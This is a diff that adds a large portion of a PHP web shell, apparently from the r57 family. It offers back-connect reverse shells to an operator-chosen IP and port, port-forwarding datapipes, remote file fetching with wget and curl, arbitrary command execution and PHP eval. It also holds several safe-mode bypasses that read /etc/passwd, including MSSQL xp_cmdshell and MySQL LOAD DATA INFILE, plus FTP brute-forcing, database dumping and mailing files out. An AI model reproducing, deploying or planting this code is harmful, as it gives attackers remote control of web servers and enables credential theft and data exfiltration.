+ $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/back.c",$back_connect_c);
+ $blah = ex("gcc -o /tmp/backc /tmp/back.c");
+ @unlink("/tmp/back.c");
+ $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/dp",$datapipe_pl);
+ $p2=which("perl");
+ if(empty($p2)) $p2="perl";
+ $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");
+ $_POST['cmd']="ps -aux | grep dp";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/dpc.c",$datapipe_c);
+ $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
+ @unlink("/tmp/dpc.c");
+ $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");
+ $_POST['cmd']="ps -aux | grep dpc";
+}
+if (!empty($_POST['alias'])){ foreach ($aliases as $alias_name=>$alias_cmd) { if ($_POST['alias'] == $alias_name){$_POST['cmd']=$alias_cmd;}}}
+if (!empty($HTTP_POST_FILES['userfile']['name']))
+{
+if(isset($_POST['nf1']) && !empty($_POST['new_name'])) { $nfn = $_POST['new_name']; }
+else { $nfn = $HTTP_POST_FILES['userfile']['name']; }
+@copy($HTTP_POST_FILES['userfile']['tmp_name'],
+            $_POST['dir']."/".$nfn)
+      or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>");
+}
+if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
+{
+ switch($_POST['with'])
+ {
+ case wget:
+ $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
+ break;
+ case fetch:
+ $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file']."";
+ break;
+ case lynx:
+ $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case links:
+ $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case GET:
+ $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case curl:
+ $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
+ break;
+ }
+}
+if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down"))
+ {
+ list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
+ if(empty($ftp_port)) { $ftp_port = 21; }
+ $connection = @ftp_connect ($ftp_server,$ftp_port,10);
+ if(!$connection) { fe($language,0); }
+ else
+  {
+  if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { fe($language,1); }
+  else
+   {
+   if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.(($windows)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']);	} 
+   if($_POST['cmd']=="ftp_file_up")   { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']);	}
+   }
+  }
+ @ftp_close($connection);
+ $_POST['cmd'] = "";
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute")
+ {
+ list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
+ if(empty($ftp_port)) { $ftp_port = 21; }
+ $connection = @ftp_connect ($ftp_server,$ftp_port,10);
+ if(!$connection) { fe($language,0); $_POST['cmd'] = ""; }
+ else if(!$users=get_users()) { echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; }
+ @ftp_close($connection);
+ }
+echo $table_up3;
+if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?("dir"):("ls -lia"); }
+else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }
+echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";
+if($safe_mode)
+{
+ switch($_POST['cmd'])
+ {
+ case 'safe_dir':
+  $d=@dir($dir);
+  if ($d)
+   {
+   while (false!==($file=$d->read()))
+    {
+     if ($file=="." || $file=="..") continue;
+     @clearstatcache();
+     list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
+     if($windows){
+     echo date("d.m.Y H:i",$mtime);
+     if(@is_dir($file)) echo "  <DIR> "; else printf("% 7s ",$size);
+     }
+     else{
+     $owner = @posix_getpwuid($uid);
+     $grgid = @posix_getgrgid($gid);
+     echo $inode." ";
+     echo perms(@fileperms($file));
+     printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
+     echo date("d.m.Y H:i ",$mtime);
+     }
+     echo "$file\n";
+    }
+   $d->close();
+   }
+  else echo $lang[$language._text29];
+ break;
+ case 'safe_file':
+  if(@is_file($_POST['file']))
+   {
+   $file = @file($_POST['file']);
+   if($file)
+    {
+    $c = @sizeof($file);
+    for($i=0;$i<$c;$i++) { echo htmlspecialchars($file[$i]); }
+    }
+   else echo $lang[$language._text29];
+   }
+  else echo $lang[$language._text31];
+  break;
+  case 'test1':
+  $ci = @curl_init("file://".$_POST['test1_file']."");
+  $cf = @curl_exec($ci);
+  echo $cf;
+  break;
+  case 'test2':
+  @include($_POST['test2_file']);
+  break;
+  case 'test3':
+  if(!isset($_POST['test3_port'])||empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; }
+  $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);
+  if($db)
+   {
+   if(@mysql_select_db($_POST['test3_md'],$db))
+    {
+     $sql = "DROP TABLE IF EXISTS temp_r57_table;";
+     @mysql_query($sql);
+     $sql = "CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL );";
+     @mysql_query($sql);
+     $sql = "LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table;";
+     @mysql_query($sql);
+     $sql = "SELECT * FROM temp_r57_table;";
+     $r = @mysql_query($sql);
+     while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }
+     $sql = "DROP TABLE IF EXISTS temp_r57_table;";
+     @mysql_query($sql);
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mysql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to mysql server";
+  break;
+  case 'test4':
+  if(!isset($_POST['test4_port'])||empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
+  $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
+  if($db)
+   {
+   if(@mssql_select_db($_POST['test4_md'],$db))
+    {
+     @mssql_query("drop table r57_temp_table",$db);
+     @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db);
+     @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
+     $res = mssql_query("select * from r57_temp_table",$db);
+     while(($row=@mssql_fetch_row($res)))
+      {
+      echo $row[0]."\r\n";
+      }
+    @mssql_query("drop table r57_temp_table",$db);
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mssql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to MSSQL server";
+  break;
+  case 'test5':
+  if (@file_exists('/tmp/mb_send_mail')) @unlink('/tmp/mb_send_mail');
+  $extra = "-C ".$_POST['test5_file']." -X /tmp/mb_send_mail";
+  @mb_send_mail(NULL, NULL, NULL, NULL, $extra);
+  $lines = file ('/tmp/mb_send_mail');
+  foreach ($lines as $line) { echo htmlspecialchars($line)."\r\n"; }
+  break;
+  case 'test6':
+  $stream = @imap_open('/etc/passwd', "", "");
+  $dir_list = @imap_list($stream, trim($_POST['test6_file']), "*");
+  for ($i = 0; $i < count($dir_list); $i++) echo $dir_list[$i]."\r\n";
+  @imap_close($stream);
+  break;
+  case 'test7':
+  $stream = @imap_open($_POST['test7_file'], "", "");
+  $str = @imap_body($stream, 1);
+  echo $str;
+  @imap_close($stream);
+  break;
+ }
+}
+else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_query")&&($_POST['cmd']!="ftp_brute")){
+ $cmd_rep = ex($_POST['cmd']);
+ if($windows) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
+ else { echo @htmlspecialchars($cmd_rep)."\n"; }}
+if ($_POST['cmd']=="ftp_brute")
+ {
+ $suc = 0;
+ foreach($users as $user)
+  {
+  $connection = @ftp_connect($ftp_server,$ftp_port,10);
+  if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; }
+  else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } }
+  @ftp_close($connection);
+  }
+ echo "\r\n-------------------------------------\r\n";
+ $count = count($users);
+ if(isset($_POST['reverse'])) { $count *= 2; }
+ echo $lang[$language.'_text97'].$count."\r\n";
+ echo $lang[$language.'_text98'].$suc."\r\n";
+ }
+if ($_POST['cmd']=="php_eval"){
+ $eval = @str_replace("<?","",$_POST['php_eval']);
+ $eval = @str_replace("?>","",$eval);
+ @eval($eval);}
+if ($_POST['cmd']=="mysql_dump")
+ {
+  if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
+  $sql = new my_sql();
+  $sql->db   = $_POST['db'];
+  $sql->host = $_POST['db_server'];
+  $sql->port = $_POST['db_port'];
+  $sql->user = $_POST['mysql_l'];
+  $sql->pass = $_POST['mysql_p'];
+  $sql->base = $_POST['mysql_db'];
+  if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; }
+  else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; }
+  else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; }
+  else {
+   if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; }
+   else if($fp){ foreach($sql->dump as $v) @fputs($fp,$v."\r\n"); }
+   else { echo "[-] ERROR! Can't write in dump file"; }
+   }
+ }
+echo "</textarea></div>";
+echo "</b>";
+echo "</td></tr></table>";
+echo "<table width=100% cellpadding=0 cellspacing=0>";
+function up_down($id)
+ {
+ global $lang;
+ global $language;
+ return '&nbsp<img src='.$_SERVER['PHP_SELF'].'?img=1 onClick="document.getElementById(\''.$id.'\').style.display = \'none\'; document.cookie=\''.$id.'=0;\';" title="'.$lang[$language.'_text109'].'"><img src='.$_SERVER['PHP_SELF'].'?img=2 onClick="document.getElementById(\''.$id.'\').style.display = \'block\'; document.cookie=\''.$id.'=1;\';" title="'.$lang[$language.'_text110'].'">';
+ }
+function div($id)
+ {
+ if(isset($_COOKIE[$id]) && $_COOKIE[$id]==0) return '<div id="'.$id.'" style="display: none;">';
+ return '<div id="'.$id.'">';
+ }
+if(!$safe_mode){
+echo $fs.$table_up1.$lang[$language.'_text2'].up_down('id1').$table_up2.div('id1').$ts;
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+else{
+echo $fs.$table_up1.$lang[$language.'_text28'].up_down('id2').$table_up2.div('id2').$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.$lang[$language.'_text42'].up_down('id3').$table_up2.div('id3').$ts;
+echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
+echo $te.'</div>'.$table_end1.$fe;
+if($safe_mode){
+echo $fs.$table_up1.$lang[$language.'_text57'].up_down('id4').$table_up2.div('id4').$ts;
+echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode && $unix){
+echo $fs.$table_up1.$lang[$language.'_text67'].up_down('id5').$table_up2.div('id5').$ts;
+echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(!$safe_mode){
+foreach ($aliases as $alias_name=>$alias_cmd)
+ {
+ $aliases2 .= "<option>$alias_name</option>";
+ }
+echo $fs.$table_up1.$lang[$language.'_text7'].up_down('id6').$table_up2.div('id6').$ts;
+echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.$lang[$language.'_text54'].up_down('id7').$table_up2.div('id7').$ts;
+echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
+echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
+echo $te.'</div>'.$table_end1.$fe;
+if(!$safe_mode && $unix){
+echo $fs.$table_up1.$lang[$language.'_text76'].up_down('id8').$table_up2.div('id8').$ts;
+echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
+echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.$lang[$language.'_text32'].up_down('id9').$table_up2.$font;
+echo "<div align=center>".div('id9')."<textarea name=php_eval cols=100 rows=3>";
+echo (!empty($_POST['php_eval'])?($_POST['php_eval']):(":: Past your Eval code ::"));
+echo "</textarea>";
+echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
+echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
+echo "</div></div></font>";
+echo $table_end1.$fe;
+if($safe_mode&&$curl_on)
+{
+echo $fs.$table_up1.$lang[$language.'_text33'].up_down('id10').$table_up2.div('id10').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode)
+{
+echo $fs.$table_up1.$lang[$language.'_text34'].up_down('id11').$table_up2.div('id11').$ts;
+echo "<table class=table1 width=100% align=center>";
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&$mysql_on)
+{
+echo $fs.$table_up1.$lang[$language.'_text35'].up_down('id12').$table_up2.div('id12').$ts;
+echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306"))));
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&$mssql_on)
+{
+echo $fs.$table_up1.$lang[$language.'_text85'].up_down('id13').$table_up2.div('id13').$ts;
+echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&$unix&&function_exists('mb_send_mail')){
+echo $fs.$table_up1.$lang[$language.'_text112'].up_down('id22').$table_up2.div('id22').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test5_file',96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&function_exists('imap_list')){
+echo $fs.$table_up1.$lang[$language.'_text113'].up_down('id23').$table_up2.div('id23').$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test6_file',96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&function_exists('imap_body')){
+echo $fs.$table_up1.$lang[$language.'_text114'].up_down('id24').$table_up2.div('id24').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test7_file',96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(@ini_get('file_uploads')){
+echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
+echo $table_up1.$lang[$language.'_text5'].up_down('id14').$table_up2.div('id14').$ts;
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,''));
+echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(!$safe_mode&&!$windows){
+echo $fs.$table_up1.$lang[$language.'_text15'].up_down('id15').$table_up2.div('id15').$ts;
+echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));
+echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.$lang[$language.'_text86'].up_down('id16').$table_up2.div('id16').$ts;
+echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14']));
+$arh = $lang[$language.'_text92'];
+if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip';   }
+if(@function_exists('gzencode'))   { $arh .= in('radio','compress',0,'gzip').' gzip'; }
+if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; }
+echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none').' '.$arh);
+echo $te.'</div>'.$table_end1.$fe;
+if(@function_exists("ftp_connect")){
+echo $table_up1.$lang[$language.'_text93'].up_down('id17').$table_up2.div('id17').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
+echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
+echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billgates@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down'));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
+echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14']));
+echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
+echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
+echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billgates@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
+echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up'));
+echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te."</td>".$fe."</tr></div></table>";
+}
+if($unix && @function_exists("ftp_connect")){
+echo $fs.$table_up1.$lang[$language.'_text94'].up_down('id18').$table_up2.div('id18').$ts;
+echo sr(15,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',85,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo sr(15,"","<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>");
+echo sr(15,"",in('checkbox','reverse id=reverse',0,'1').$lang[$language.'_text101']);
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(@function_exists("mail")){
+echo $table_up1.$lang[$language.'_text102'].up_down('id19').$table_up2.div('id19').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("x.neo@hotmail.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir));
+echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billgates@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("hello billy"))));
+echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=33 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>');
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
+echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("x.neo@hotmail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir));
+echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billgates@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("file from KingDefacer"))));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
+echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none').' '.$arh);
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
+echo $te."</td>".$fe."</tr></div></table>";
+}
+if($mysql_on||$mssql_on||$pg_on||$ora_on)
+{
+$select = '<select name=db>';
+if($mysql_on) $select .= '<option>MySQL</option>';
+if($mssql_on) $select .= '<option>MSSQL</option>';
+if($pg_on)    $select .= '<option>PostgreSQL</option>';
+if($ora_on)   $select .= '<option>Oracle</option>';
+$select .= '</select>';
+echo $table_up1.$lang[$language.'_text82'].up_down('id20').$table_up2.div('id20').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text40']."</div></b></font>";
+echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
